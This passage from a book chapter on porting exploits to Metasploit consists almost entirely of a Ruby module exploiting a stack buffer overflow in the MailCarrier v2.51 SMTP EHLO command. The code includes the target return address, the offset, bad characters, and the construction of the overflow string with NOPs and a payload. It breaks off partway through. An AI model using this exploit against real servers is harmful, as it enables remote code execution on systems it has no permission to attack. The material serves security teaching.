Porting Exploits to the Metasploit Framework
225
def initialize(info = {})
super(update_info(info,
'Name' => 'TABS MailCarrier v2.51 SMTP EHLO Overflow',
'Description' => %q{
This module exploits the MailCarrier v2.51 suite SMTP service.
The stack is overwritten when sending an overly long EHLO command.
},
'Author' => [ 'Your Name' ],
'Arch' => [ ARCH_X86 ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 7724 $',
'References' =>
[
[ 'CVE', '2004-1638' ],
[ 'OSVDB', '11174' ],
[ 'BID', '11535' ],
[ 'URL', 'http://www.exploit-db.com/exploits/598' ],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x0a\x0d\x3a",
'StackAdjustment' => -3500,
},
'Platform' => ['win'],
'Targets' =>
[
[ 'Windows XP SP2 - EN', { 'Ret' => 0x7d17dd13, 'Offset' => 5093 }
],
],
'DisclosureDate' => 'Oct 26 2004',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(25),
Opt::LHOST(), # Required for stack offset
], self.class)
end
def exploit
connect
sploit = "EHLO "
sploit << rand_text_alpha_upper(target['Offset'])
sploit << [target['Ret']].pack('V')
sploit << make_nops(32)
sploit << payload.encoded